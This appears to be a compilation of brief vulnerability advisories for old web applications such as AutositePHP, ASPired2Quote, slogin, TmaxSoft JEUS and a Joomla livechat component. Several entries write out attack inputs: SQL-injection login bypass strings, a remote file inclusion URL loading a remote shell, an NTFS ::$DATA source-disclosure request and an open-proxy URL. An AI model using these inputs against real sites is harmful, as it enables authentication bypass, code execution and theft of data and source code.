AutositePHP v2.0.3 is vulnerable to Local File Inclusion, Cross Site Request Forgery and Edit File. An attacker can exploit these vulnerabilities to gain access to sensitive information, delete user accounts and modify files on the webserver.
A vulnerability in the Internal E-Mail System of http://asp-dev.com/main.asp?page=41 allows an attacker to bypass authentication by using the username ' or '1'='1 and the password ' or '1'='1. This vulnerability affects the http://asp-dev.com/message page.
ASPired2Quote is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
A vulnerability exists in the Discussion Web 4.0 web application, which allows an attacker to download the Microsoft Access Database file containing the application's data. This vulnerability is due to the fact that the application does not properly restrict access to the database file. An attacker can exploit this vulnerability by directly requesting the database file from the web server.
If $slogin_path is not given, it becomes a null variable. Scrolling down the source code, you can see an include of that variable everywhere. Just one of the few vulnerable includes is include_once ($slogin_path . "header.inc.php");. The header.inc.php file, like all the files of this CMS, is in the same directory as slogin_lib.inc.php, so a fix could be simply to include the file directly, without including a variable, which should be null because all the files are in the same directory. Exploit: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell] and /[path]/users.txt
The bugged file is: /[path]/admin/usercheck.php. Go to /[path]/admin/index.php and put as username and password the following SQL code: ' or '1=1. You are the admin now, bypass successful =)
On NTFS, TmaxSoft JEUS, which is a famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs (Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA, so it treated test.jsp::$DATA as a normal file when it was requested. This is similar to the past MS Windows IIS vulnerability (Bid 0149). The attacker can obtain them easily using a URL request: http://www.target.com/foo/bar.jsp::$DATA
administrator/components/com_livechat/getChat.php and administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last', and administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com sends HTTP_FORWARDED
A buffer overflow vulnerability exists in the application due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the application, which can cause the application to crash or allow the attacker to execute arbitrary code in the context of the application.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. The malicious SQL statement can be used to extract sensitive information from the database, such as usernames and passwords.